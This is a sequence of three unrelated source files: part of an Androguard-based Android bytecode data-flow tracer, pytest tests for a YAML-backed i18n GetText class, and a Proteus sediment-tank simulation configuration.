continue
field_source = operands[0][1]
self.fn_trace_forward(
field_xref_to_method_string,
new_chain
)
def fn_trace_reverse(self, trace_from, chain, position=0,
class_or_method=None):
"""Performs reverse tracing.
:param trace_from: string indicating starting point for trace
:param chain: string containing comma-separated "chain links"
:param position: integer operand index
:param class_or_method: either "<class>" or "<method">
"""
# Get class/method/desc parts.
[class_part, method_part, desc_part] = \
self.fn_determine_class_method_desc(
trace_from,
class_or_method
)
# Include subclasses.
all_classes = \
self.inst_analysis_utils.fn_find_subclasses(class_part)
all_classes.append(class_part)
for one_class in all_classes:
combined_method_string = one_class
if '.' not in method_part:
combined_method_string = \
combined_method_string + '->' + method_part
if '.' not in desc_part:
combined_method_string = \
combined_method_string + desc_part
method_check_string = 'e' + combined_method_string + ' ' + str(position)
if method_check_string in self.checked_methods:
continue
self.checked_methods.add(method_check_string)
# If the trace to type doesn't care about arguments or results
# (i.e., just a class or method),
# then perform a stop condition check.
if ((self.trace_to_type != 'RESULTOF') and
(self.trace_to_type != 'ARGTO')):
self.fn_check_generic_stop_condition(combined_method_string)
if self.stop_condition == STOP_CONDITION_TRUE:
self.output_chains.append(chain)
self.stop_condition = False
continue
# Check to see if the method is a JavaScript interface.
# If it is, then the commands themselves may not be found within
# the code. However, any webview that uses this must call the
# <init> method of this class.
if combined_method_string in self.all_annotations:
if ('Landroid/webkit/JavascriptInterface;' in
self.all_annotations[combined_method_string]):
method_part = '<init>'
desc_part = '.'
# Get starting points.
starting_points = \
self.inst_analysis_utils.fn_get_calls_to_method(
one_class,
method_part,
desc_part
)
for starting_point in starting_points:
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
starting_point
)
starting_point_string = c + '->' + m + d
method_check_string = 'r' \
+ starting_point_string \
+ ' ' \
+ combined_method_string
if method_check_string in self.checked_methods:
continue
self.checked_methods.add(method_check_string)
num_locals = self.fn_get_locals(starting_point)
if starting_point_string in self.all_annotations:
if ('Landroid/webkit/JavascriptInterface;' in
self.all_annotations[starting_point_string]):
chain = chain + ',' + starting_point_string
starting_point_string = starting_point.get_class_name() \
+ '-><init>'
self.fn_trace_reverse(
starting_point_string,
chain + ',' + starting_point_string,
1
)
continue
index_reg = self.fn_identify_instr_reg(
starting_point,
combined_method_string,
position
)
if index_reg == []:
continue
for tuple in index_reg:
if tuple[1] < num_locals:
v_reg_trace_output = self.fn_trace_v_reverse(
starting_point,
tuple[0]-1,
tuple[1],
chain
)
if v_reg_trace_output == True:
self.output_chains.append(chain)
self.stop_condition = STOP_CONDITION_FALSE
continue
else:
continue
else:
self.fn_trace_reverse(
starting_point_string,
chain + ',' + starting_point_string,
tuple[1] - num_locals
)
def fn_trace_v_reverse(self, method, index, register, chain):
"""Traces a register backward from a starting point within a method.
:param method: Androguard EncodedMethod to trace through
:param index: instruction index (integer) to start trace from
:param register: integer value of register
:param chain: string containing comma-separated "chain links"
"""
instructions = list(method.get_instructions())
num_instructions = len(instructions)
num_locals = self.fn_get_locals(method)
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
method
)
method_string = c + '->' + m + d
new_chain = chain + ',' + method_string
for i in range(index, 0, -1):
instruction = instructions[i]
opcode = instruction.get_op_value()
operands = instruction.get_operands()
for op_index, operand in enumerate(operands):
# 0x00 is "register".
if operand[0] != 0:
continue
if (register != operand[1]):
continue
# move
if ((opcode in
[0x01, 0x02, 0x03, 0x04, 0x05,
0x06, 0x07, 0x08, 0x09]) and
(op_index == 0)):
move_source = operands[1][1]
if move_source < num_locals:
self.fn_trace_v_reverse(
method,
i-1,
move_source,
chain
)
else:
self.fn_trace_reverse(
method_string,
new_chain,
move_source - num_locals
)
return
# move-result.
elif (opcode in [0x0A, 0x0B, 0x0C]):
previous_instruction = instructions[i-1]
# If move-result did not follow an invoke opcode,
# then continue.
if (previous_instruction.get_op_value() not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
# See if previous instruction satisfies trace to condition.
if self.trace_to_type == 'RESULTOF':
self.fn_check_traceto_result(previous_instruction)
if self.stop_condition == STOP_CONDITION_TRUE:
return True
# Trace each register as well.
previous_operands = previous_instruction.get_operands()
for previous_operand in previous_operands:
if previous_operand[0] != 0:
continue
if previous_operand[1] < num_locals:
self.fn_trace_v_reverse(
method,
i-2,
previous_operand[1],
chain
)
else:
self.fn_trace_reverse(
method_string,
new_chain,
previous_operand[1] - num_locals
)
return
# Constant declaration. This indicates a value change.
# We aren't interested.
elif (opcode in
[0x12, 0x13, 0x14, 0x15, 0x16,
0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C]):
return
# aget. We trace the source, and stop tracing the
# current register (because it would have had a different
# value prior to aget).
elif ((opcode in
[0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A]) and
(op_index==0)):
aget_source = operands[1][1]
if aget_source < num_locals:
self.fn_trace_v_reverse(
method,
i-1,
aget_source,
chain
)
else:
self.fn_trace_reverse(
method_string,
new_chain,
aget_source - num_locals
)
return
# aput.
elif((opcode in
[0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51]) and
(op_index == 1)):
aput_source = operands[0][1]
if aput_source < num_locals:
self.fn_trace_v_reverse(
method,
i-1,
aput_source,
chain
)
else:
self.fn_trace_reverse(
method_string,
new_chain,
aput_source - num_locals
)
return
# iget. We trace the source field, and stop tracing the
# current register (because it would have had a different
# value prior to aget).
elif ((opcode in
[0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]) and
(op_index==0)):
iget_source = operands[2][2]
self.fn_trace_field_reverse(iget_source, new_chain)
return
# sget.
elif ((opcode in
[0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]) and
(op_index==0)):
sget_source = operands[1][2]
self.fn_trace_field_reverse(sget_source, new_chain)
return
# invoke-<> method calls.
# This should actually never come up, because ARGTO wouldn't be
# TRACETO in reverse tracing.
elif (opcode in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
if self.trace_to_type == 'ARGTO':
self.fn_check_traceto_arg(instruction, op_index)
if self.stop_condition == STOP_CONDITION_TRUE:
return True
# If this is a class instantiation, then trace other args.
if op_index == 0:
if len(operands)<= 2:
continue
for x in range(1, len(operands)-1):
if operands[x][0] != 0:
continue
arg_operand = operands[x][1]
if arg_operand < num_locals:
self.fn_trace_v_reverse(
method,
i-1,
arg_operand,
chain
)
else:
self.fn_trace_reverse(
method_string,
new_chain,
arg_operand - num_locals
)
# Don't return here!
def fn_trace_field_reverse(self, field, chain):
"""Identifies "put" for field and traces the appropriate register.
:param field: string representing field
:param chain: string containing comma-separated "chain links"
"""
field_components = field.split(' ')
field = field_components[0] + ':' + field_components[1]
field = field.replace('[','\[')
all_fields = self.androguard_dx.find_fields(field)
all_field_xref_from = []
for field in all_fields:
xref_from = field.get_xref_write()
if xref_from[1] not in all_field_xref_from:
all_field_xref_from.append(xref_from[1])
for field_xref_from_method in all_field_xref_from:
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
field_xref_from_method
)
field_xref_from_method_string = c + '->' + m + d
new_chain = chain + ',' + field_xref_from_method_string
num_locals = self.fn_get_locals(field_xref_from_method)
instructions = list(field_xref_from_method.get_instructions())
for index, instruction in enumerate(instructions):
if (instruction.get_op_value() in
[0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F,
0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D]):
operands = instruction.get_operands()
last_operand = operands[-1][2]
if last_operand != field:
continue
field_source = operands[0][1]
if field_source < num_locals:
self.fn_trace_v_reverse(
field_xref_from_method,
index-1,
field_source,
chain
)
else:
self.fn_trace_reverse(
field_xref_from_method_string,
new_chain,
field_source - num_locals
)
def fn_check_traceto_arg(self, instruction, op_index):
"""Checks if instruction+operand satisfy an ARGTO condition in TRACETO.
Sets a variable to indicate that the condition has been satisfied.
:param instruction: androguard.core.bytecodes.dvm.Instruction
:param op_index: integer operand index
"""
if op_index != self.trace_to_argindex:
return
operands = instruction.get_operands()
last_operand = operands[-1][2]
for item in self.trace_to_list:
if item in last_operand:
self.stop_condition = STOP_CONDITION_TRUE
return
def fn_check_traceto_result(self, invoked_method_instruction):
"""Checks if an instruction satisfies a RESULTOF condition in TRACETO.
Sets a variable to indicate that the condition has been satisfied.
:param invoked_method_instruction: Androguard EncodedMethod
"""
operands = invoked_method_instruction.get_operands()
last_operand = operands[-1][2]
for item in self.trace_to_list:
if item in last_operand:
self.stop_condition = STOP_CONDITION_TRUE
return
def fn_check_generic_stop_condition(self, check_value):
"""Checks if an instruction satisfies a generic TRACETO condition.
Sets a variable to indicate that the condition has been satisfied.
:param check_value: string to check against trace_to classes/methods
"""
if self.to_class_method == '<class>':
check_value = check_value.split('->')[0]
if check_value in self.trace_to_list:
self.stop_condition = STOP_CONDITION_TRUE
return
# Special types of checks for when the traceto is hardcoded.
if self.hardcoded_traceto == False:
return
# This should never be true. Hardcoded traceto's will only have one
# value in the list (even with ORs).
if len(self.trace_to_list) > 1:
return
trace_to_item = self.trace_to_list[0]
# Check for wildcard classes.
if ((self.to_class_method == '<class>') and ('*' in trace_to_item)):
trace_to_item = trace_to_item.replace('*', '')
if trace_to_item in check_value:
self.stop_condition = STOP_CONDITION_TRUE
else:
self.stop_condition = STOP_CONDITION_FALSE
return
# Do a partial search for methods only. Do this only when the entire
# trace-to is hardcoded.
# If traceto is only a class, we can't do much.
if '->' not in trace_to_item:
return
if '->' not in check_value:
return
# If traceto doesn't have descriptor, don't proceed.
# Else, we might end up with way too many FPs.
if '(' not in trace_to_item:
return
if '(' not in check_value:
return
if trace_to_item.split('->')[1] == check_value.split('->')[1]:
self.stop_condition = STOP_CONDITION_MAYBE
return
def fn_identify_instr_reg(self, calling_method, called_method,
reg_position):
"""Identifies the index and register used for a method call.
:param calling_method: Androguard EncodedMethod containing call
to method of interest
:param called_method: string representing method of interest (smali)
:param reg_position: integer operand index
:returns: list of (instruction index, register) tuples
"""
index_reg = []
instructions = list(calling_method.get_instructions())
for index, instruction in enumerate(instructions):
opcode = instruction.get_op_value()
if (opcode not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
all_operands = instruction.get_operands()
method_operand = all_operands[-1][2]
if called_method in method_operand:
if reg_position >= (len(all_operands)-1):
reg_position = len(all_operands)-2
operand_of_interest = all_operands[int(reg_position)][1]
index_reg.append((index, operand_of_interest))
return index_reg
def fn_identify_result_reg(self, calling_method, called_method):
"""Identifies the index and register of the output of a method call.
:param calling_method: Androguard EncodedMethod containing call
to method of interest
:param called_method: string representing method of interest (smali)
:returns: list of (instruction index, register) tuples
"""
index_reg = []
try:
instructions = list(calling_method.get_instructions())
except:
return []
for index, instruction in enumerate(instructions):
opcode = instruction.get_op_value()
if (opcode not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
all_operands = instruction.get_operands()
method_operand = all_operands[-1][2]
if called_method in method_operand:
if index == (len(instructions)-1):
break
next_instr = instructions[index+1]
if next_instr.get_op_value() not in [0x0A, 0x0B, 0x0C]:
continue
result_register = (next_instr.get_operands())[0][1]
index_reg.append((index+1, result_register))
return index_reg
def fn_determine_class_method_desc(self, trace_from, trace_from_type=None):
"""Determines the class/method/desc parts based on trace start point.
:param trace_from: string denoting trace start point
:param trace_from_type: string containing trace start point type
(either "<class>" or "<method>")
:returns: list containing class, method, descriptor parts
"""
[class_part, method_part, desc_part] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_string(
trace_from
)
# If we care only about the class part, overwrite the method/desc
# parts with '.' (i.e., "don't care")
if trace_from_type == '<class>':
method_part = '.'
desc_part = '.'
return [class_part, method_part, desc_part]
def fn_get_trace_type(self, string):
"""Gets trace starting point type.
:param string: string containing trace start point type (either
"<class>" or "<method>". The string may not directly contain
these values, in which case the type will have to be inferred.
:returns: list containing the start point type and the modified string
(within the "<class>" or "<method>" indication removed)
"""
trace_type = '<class>'
if ':' in string:
trace_type = string.split(':')[0]
string = string[len(trace_type)+1:]
else:
if '->' in string:
trace_type = '<method>'
return [trace_type, string]
def fn_get_trace_items(self, string, trace_type):
"""Gets the actual strings to use as start/end points of trace.
:param string: the string specified within the template
:param trace_type: string (either "<class>" or "<method>"), indicating
whether the trace should begin/end at the class level or method
level
:returns: list of possible start/end points
"""
output_items = []
# If the string begins with @, then we need to find linked items.
if string[0] == '@':
self.hardcoded_traceto = False
# If a sub-part has not been specified, then assume that the
# entire string is the link name.
if ']' not in string:
link_name = string
link_subpart = ''
remaining_string = ''
# If a sub-part has been specified, then split the string to
# identify the link name, relevant sub-part, and remainder
# of string.
else:
split_for_link = string.split(']')
remaining_string = split_for_link[1]
second_split = split_for_link[0].split('[')
link_name = second_split[0]
link_subpart = second_split[1].replace(' ', '')
# Get all linked items.
linked_items = self.inst_analysis_utils.fn_get_linked_items(
self.current_links,
link_name
)
if link_subpart == '':
for linked_item in linked_items:
return_string = linked_item + remaining_string
if trace_type == '<class>':
return_string = return_string.split('->')[0]
output_items.append(return_string)
elif link_subpart == '<class>':
for linked_item in linked_items:
class_part_only = linked_item.split('->')[0]
return_string = class_part_only + remaining_string
if trace_type == '<class>':
return_string = return_string.split('->')[0]
output_items.append(return_string)
elif link_subpart == '<method>':
for linked_item in linked_items:
if '->' not in linked_item:
continue
return_string = linked_item + remaining_string
if trace_type == '<class>':
return_string = return_string.split('->')[0]
output_items.append(return_string)
# If the string doesn't begin with @, then it's a normal string.
else:
self.hardcoded_traceto = True
if trace_type == '<class>':
string = string.split('->')[0]
output_items = [string]
return output_items
def fn_enumerate_trace_source_sinks(self, trace_template):
"""Enumerates the (list of) trace start and end points from template.
:param trace_template: dictionary object corresponding to a single
trace, from which trace end points are to be extracted
:returns: list containing two lists - the first a list of possible
start points and the second, a list of possible end points
"""
# Get the start points.
trace_from_string = trace_template['TRACEFROM']
from_arg_index = 0
trace_from_type = None
if 'RESULTOF' in trace_from_string:
trace_from_type = 'RESULTOF'
trace_from = trace_from_string.split('RESULTOF')[1]
trace_from = trace_from.strip()
elif 'ARGTO' in trace_from_string:
trace_from_type = 'ARGTO'
trace_from = \
(trace_from_string.split('ARGTO')[1]).split('ARGINDEX')[0]
trace_from = trace_from.strip()
if 'ARGINDEX' in trace_from_string:
from_arg_index = \
int((trace_from_string.split('ARGINDEX')[1]).strip())
else:
trace_from = trace_from_string
if ' OR ' in trace_from:
trace_from_string_list = trace_from.split(' OR ')
else:
trace_from_string_list = [trace_from]
# Get the trace ending points.
trace_to_string = trace_template['TRACETO']
to_arg_index = None
trace_to_type = None
if 'RESULTOF' in trace_to_string:
trace_to_type = 'RESULTOF'
trace_to = trace_to_string.split('RESULTOF')[1]
trace_to = trace_to.strip()
elif 'ARGTO' in trace_to_string:
trace_to_type = 'ARGTO'
trace_to = \
(trace_to_string.split('ARGTO')[1]).split('ARGINDEX')[0]
trace_to = trace_to.strip()
if 'ARGINDEX' in trace_to_string:
to_arg_index = \
int((trace_to_string.split('ARGINDEX')[1]).strip())
trace_to = trace_to_string
if ' OR ' in trace_to:
trace_to_string_list = trace_to.split(' OR ')
else:
trace_to_string_list = [trace_to]
# Set variables.
self.trace_from_main_list = trace_from_string_list
self.trace_from_type = trace_from_type
self.trace_from_argindex = from_arg_index
self.trace_to_main_list = trace_to_string_list
self.trace_to_type = trace_to_type
self.trace_to_argindex = to_arg_index
def fn_analyse_returns(self, trace_template):
"""Analyses the return object and appends items to returns list.
:param trace_template: dictionary object containing RETURN element
"""
returnables = trace_template['RETURN']
returnable_elements_name = returnables.split(' AS ')[1]
return_type = returnables.split(' AS ')[0]
# Analyse each chain.
for chain_string in self.output_chains:
chain = chain_string.split(',')
if self.trace_direction == TRACE_REVERSE:
chain.reverse()
output_str = ''
for chain_node in chain:
chain_node = chain_node.strip()
if output_str == '':
output_str = chain_node
else:
output_str = output_str + ',' + chain_node
self.current_returns.append({returnable_elements_name: output_str})
def fn_get_jsinterface_classes_methods(self):
"""Gets all classes and methods with JavascriptInterface annotations."""
jsinterface_methods = set()
jsinterface_classes = set()
for method in self.all_annotations:
if ('Landroid/webkit/JavascriptInterface;' in
self.all_annotations[method]):
jsinterface_methods.add(method)
class_part = method.split('->')[0]
jsinterface_classes.add(class_part)
self.jsinterface_methods = jsinterface_methods
self.jsinterface_classes = jsinterface_classes
def fn_get_locals(self, method):
num_registers = method.code.get_registers_size()
num_parameter_registers = method.code.get_ins_size()
num_local_registers = num_registers - num_parameter_registers
return num_local_registers |
<gh_stars>10-100
# coding: utf-8
"""
Test i18n class
"""
from __future__ import unicode_literals, absolute_import
from mock import MagicMock, patch, mock_open
import pytest
import sugar.lib.i18n
from sugar.utils.jid import jidstore
# pylint: disable=W0621,R0201,R0201,W0612
@pytest.fixture
def gettext_class():
"""
Un-singleton the class init, so it can be reused in the tests.
:return: GetText instance
"""
sugar.lib.i18n.GetText.__ref__ = None
return sugar.lib.i18n.GetText
class TestGetText(object):
"""
Test case for the GetText
"""
@patch("sugar.lib.i18n.get_logger", MagicMock())
@patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere"))
@patch("os.path.exists", MagicMock(return_value=True))
def test_internal_format(self, gettext_class):
"""
Test internal format and the structure within the YAML i18n messages.
:param gettext_class: gettext_class fixture
:return: None
"""
translation_data = """
apple:
none: no apples
one: one apple
few: few apples
many: lots of apples
""".strip()
with patch("sugar.utils.files.fopen", mock_open(read_data=translation_data), create=True):
gtx = gettext_class()
assert gtx.gettext("apple") == "no apples"
assert gtx.gettext("apple", 1) == "one apple"
assert gtx.gettext("apple", 2) == "few apples"
assert gtx.gettext("apple", 4) == "lots of apples"
@patch("sugar.lib.i18n.get_logger", MagicMock())
@patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere"))
@patch("os.path.exists", MagicMock(return_value=True))
@patch("os.access", MagicMock(return_value=True))
def test_autoadd_data(self, gettext_class):
"""
Test auto-add message to the translation.
:param gettext_class: gettext_class fixture
:return: None
"""
msg = "<NAME>"
yaml_mock = MagicMock()
with patch("sugar.utils.files.fopen", mock_open(read_data=""),
create=True) as fhm, patch("sugar.lib.i18n.yaml.dump", yaml_mock) as yml:
gtx = gettext_class()
for count in [0, 1, 3, 4]:
gtx.gettext(msg, count=count)
assert yaml_mock.called
translation_entry = yaml_mock.call_args_list[0][0][0]
assert msg in translation_entry
plurals = translation_entry[msg]
assert plurals["none"] == plurals["one"] == plurals["few"] == plurals["many"] == msg
@patch("sugar.lib.i18n.get_logger", MagicMock())
@patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere/{}".format(jidstore.create())))
@patch("os.access", MagicMock(return_value=True))
def test_load_skip_no_access(self, gettext_class):
"""
Test data is not loaded if no read access to it.
:param gettext_class: gettext_class fixture
:return: None
"""
assert gettext_class().path is None
@patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere/{}".format(jidstore.create())))
@patch("os.path.exists", MagicMock(return_value=True))
@patch("os.access", MagicMock(return_value=False))
def test_save_skip_no_access(self, gettext_class):
"""
Test if auto-add won't add if write-access is denied.
:param gettext_class:
:return:
"""
logger_mock = MagicMock()
with patch("sugar.utils.files.fopen",
mock_open(read_data="")) as fhdr, patch("sugar.lib.i18n.get_logger",
logger_mock) as lgr:
gtx = gettext_class()
gtx.gettext(jidstore.create())
msg = logger_mock.call_args_list[0][0][0].log.error.call_args_list[0][0][0]
assert "Unable to update i18n messages at" in msg
|
<reponame>AntoninoScala/air-water-vv
from proteus import StepControl
from math import *
import proteus.MeshTools
from proteus import Domain, Context
from proteus.default_n import *
from proteus.Profiling import logEvent
from proteus.mprans import SpatialTools as st
from proteus import Gauges as ga
from proteus import WaveTools as wt
from proteus.mprans.SedClosure import HsuSedStress
opts=Context.Options([
# predefined test cases
("waterLine_x", 10.00, "Width of free surface from left to right"),
("waterLine_z", 0.3, "Heigth of free surface above bottom"),
("Lx", 2.00, "Length of the numerical domain"),
("Ly", 0.5, "Heigth of the numerical domain"),
# fluid paramters
("rho_0", 998.2, "water density"),
("rho_1", 998.2, "air density"),
("nu_0", 1.004e-6, "water kin viscosity"),
("nu_1", 1.004e-6, "air kin viscosity"),
('g',np.array([0.0, -9.8, 0.0]),'Gravitational acceleration'),
# sediment parameters
('cSed', 0.05,'Sediment concentration'),
('rho_s',2600 ,'sediment material density'),
('alphaSed', 150.,'laminar drag coefficient'),
('betaSed', 0.0,'turbulent drag coefficient'),
('grain',0.0025, 'Grain size'),
('packFraction',0.2,'threshold for loose / packed sediment'),
('packMargin',0.01,'transition margin for loose / packed sediment'),
('maxFraction',0.635,'fraction at max sediment packing'),
('frFraction',0.57,'fraction where contact stresses kick in'),
('sigmaC',1.1,'Schmidt coefficient for turbulent diffusion'),
('C3e',1.2,'Dissipation coefficient '),
('C4e',1.0,'Dissipation coefficient'),
('eR', 0.8, 'Collision stress coefficient (module not functional)'),
('fContact', 0.05,'Contact stress coefficient'),
('mContact', 3.0,'Contact stress coefficient'),
('nContact', 5.0,'Contact stress coefficient'),
('angFriction', pi/6., 'Angle of friction'),
('vos_limiter', 0.05, 'Weak limiter for vos'),
('mu_fr_limiter', 100.00,'Hard limiter for contact stress friction coeff'),
# numerical options
("refinement", 75.,"L[0]/refinement"),
("sedimentDynamics", True, "Enable sediment dynamics module"),
("openTop", not True, "Enable open atmosphere for air phase on the top"),
("cfl", 0.90 ,"Target cfl"),
("duration", 6.0 ,"Duration of the simulation"),
("PSTAB", 1.0, "Affects subgrid error"),
("res", 1.0e-10, "Residual tolerance"),
("epsFact_density", 3.0, "Control width of water/air transition zone"),
("epsFact_consrv_diffusion", 1.0, "Affects smoothing diffusion in mass conservation"),
("useRANS", 0, "Switch ON turbulence models: 0-None, 1-K-Epsilon, 2-K-Omega1998, 3-K-Omega1988"), # ns_closure: 1-classic smagorinsky, 2-dynamic smagorinsky, 3-k-epsilon, 4-k-omega
("sigma_k", 1.0, "sigma_k coefficient for the turbulence model"),
("sigma_e", 1.0, "sigma_e coefficient for the turbulence model"),
("Cmu", 0.09, "Cmu coefficient for the turbulence model"),
])
# ----- Sediment stress ----- #
sedClosure = HsuSedStress(aDarcy = opts.alphaSed,
betaForch = opts.betaSed,
grain = opts.grain,
packFraction = opts.packFraction,
packMargin = opts.packMargin,
maxFraction = opts.maxFraction,
frFraction = opts.frFraction,
sigmaC = opts.sigmaC,
C3e = opts.C3e,
C4e = opts.C4e,
eR = opts.eR,
fContact = opts.fContact,
mContact = opts.mContact,
nContact = opts.nContact,
angFriction = opts.angFriction,
vos_limiter = opts.vos_limiter,
mu_fr_limiter = opts.mu_fr_limiter,
)
# ----- DOMAIN ----- #
domain = Domain.PlanarStraightLineGraphDomain()
# ----- Phisical constants ----- #
# Water
rho_0 = opts.rho_0
nu_0 = opts.nu_0
# Air
rho_1 = opts.rho_1 # 1.205 #
nu_1 = opts.nu_1 # 1.500e-5 #
# Sediment
rho_s = opts.rho_s
nu_s = 1000000
dragAlpha = 0.0
# Surface tension
sigma_01 = 0.0
# Gravity
g = opts.g
gamma_0 = abs(g[1])*rho_0
# Initial condition
waterLine_x = opts.waterLine_x
waterLine_z = opts.waterLine_z
waterLevel = waterLine_z
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Domain and mesh
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
L = (opts.Lx, opts.Ly)
he = L[0]/opts.refinement
dim = dimx, dimy = L
coords = [ dimx/2., dimy/2. ]
boundaryOrientations = {'y-': np.array([0., -1.,0.]),
'x+': np.array([+1, 0.,0.]),
'y+': np.array([0., +1.,0.]),
'x-': np.array([-1., 0.,0.]),
'sponge': None,
}
boundaryTags = {'y-': 1,
'x+': 2,
'y+': 3,
'x-': 4,
'sponge': 5,
}
tank = st.Rectangle(domain, dim=dim, coords=coords)
#############################################################################################################################################################################################################################################################################################################################################################################################
# ----- BOUNDARY CONDITIONS ----- #
#############################################################################################################################################################################################################################################################################################################################################################################################
tank.BC['y-'].setFreeSlip()
tank.BC['y+'].setFreeSlip()
tank.BC['x-'].setFreeSlip()
tank.BC['x+'].setFreeSlip()
# ----- If open boundary at the top
if opts.openTop:
tank.BC['y+'].reset()
tank.BC['y+'].setAtmosphere()
tank.BC['y+'].us_dirichlet.setConstantBC(0.0)
tank.BC['y+'].vs_dirichlet.setConstantBC(0.0)
tank.BC['y+'].vos_advective.setConstantBC(0.0)
tank.BC['y+'].pInc_dirichlet.setConstantBC(0.0)
tank.BC['y+'].pInit_dirichlet.setConstantBC(0.0)
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Turbulence
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
if opts.useRANS:
kInflow = 1e-6
dissipationInflow = 1e-6
tank.BC['x-'].setTurbulentZeroGradient()
tank.BC['x+'].setTurbulentZeroGradient()
tank.BC['y-'].setTurbulentZeroGradient()
tank.BC['y+'].setTurbulentZeroGradient()
######################################################################################################################################################################################################################
# Numerical Options and other parameters #
######################################################################################################################################################################################################################
domain.MeshOptions.he = he
from math import *
from proteus import MeshTools, AuxiliaryVariables
import numpy
import proteus.MeshTools
from proteus import Domain
from proteus.Profiling import logEvent
from proteus.default_n import *
from proteus.ctransportCoefficients import smoothedHeaviside
from proteus.ctransportCoefficients import smoothedHeaviside_integral
st.assembleDomain(domain)
#----------------------------------------------------
# Time stepping and velocity
#----------------------------------------------------
T=opts.duration
weak_bc_penalty_constant = 10.0/nu_0 #100
dt_fixed = 0.001
dt_init = min(0.1*dt_fixed,0.001)
nDTout= int(round(T/dt_fixed))
runCFL = opts.cfl
sedimentDynamics=opts.sedimentDynamics
openTop=opts.openTop
#----------------------------------------------------
# Discretization -- input options
#----------------------------------------------------
genMesh = True
movingDomain = False
applyRedistancing = True
useOldPETSc = False
useSuperlu = False #True
timeDiscretization = 'be'#'vbdf'#'vbdf' # 'vbdf', 'be', 'flcbdf'
spaceOrder = 1
pspaceOrder = 1
useHex = False
useRBLES = 0.0
useMetrics = 1.0
applyCorrection = True
useVF = 1.0
useOnlyVF = False
useRANS = opts.useRANS # 0 -- None
# 1 -- K-Epsilon
# 2 -- K-Omega
KILL_PRESSURE_TERM = False
fixNullSpace_PresInc = True
INTEGRATE_BY_PARTS_DIV_U_PresInc = True
CORRECT_VELOCITY = True
STABILIZATION_TYPE = 0 #0: SUPG, 1: EV via weak residual, 2: EV via strong residual
# Input checks
if spaceOrder not in [1, 2]:
print("INVALID: spaceOrder" + spaceOrder)
sys.exit()
if useRBLES not in [0.0, 1.0]:
print("INVALID: useRBLES" + useRBLES)
sys.exit()
if useMetrics not in [0.0, 1.0]:
print("INVALID: useMetrics")
sys.exit()
# Discretization
nd = tank.nd
if spaceOrder == 1:
hFactor = 1.0
if useHex:
basis = C0_AffineLinearOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 2)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 2)
else:
basis = C0_AffineLinearOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 3)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 3)
elif spaceOrder == 2:
hFactor = 0.5
if useHex:
basis = C0_AffineLagrangeOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 4)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 4)
else:
basis = C0_AffineQuadraticOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 4)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 4)
if pspaceOrder == 1:
if useHex:
pbasis = C0_AffineLinearOnCubeWithNodalBasis
else:
pbasis = C0_AffineLinearOnSimplexWithNodalBasis
elif pspaceOrder == 2:
if useHex:
pbasis = C0_AffineLagrangeOnCubeWithNodalBasis
else:
pbasis = C0_AffineQuadraticOnSimplexWithNodalBasis
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Numerical parameters
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
ns_forceStrongDirichlet = False
ns_sed_forceStrongDirichlet = False
backgroundDiffusionFactor=0.01
if useMetrics:
ns_shockCapturingFactor = 0.5
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ns_sed_shockCapturingFactor = 0.5
ns_sed_lag_shockCapturing = True
ns_sed_lag_subgridError = True
ls_shockCapturingFactor = 0.5
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
vof_shockCapturingFactor = 0.5
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
vos_shockCapturingFactor = 0.9 # <-------------------------------------
vos_lag_shockCapturing = True
vos_sc_uref = 1.0
vos_sc_beta = 1.0
rd_shockCapturingFactor = 0.5
rd_lag_shockCapturing = False
epsFact_vos = 5.0 # <-------------------------------------
epsFact_density = opts.epsFact_density # 1.5
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = opts.epsFact_consrv_diffusion # 0.1
redist_Newton = True
kappa_shockCapturingFactor = 0.25
kappa_lag_shockCapturing = True #False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.25
dissipation_lag_shockCapturing = True #False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
else:
ns_shockCapturingFactor = 0.9
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ns_sed_shockCapturingFactor = 0.9
ns_sed_lag_shockCapturing = True
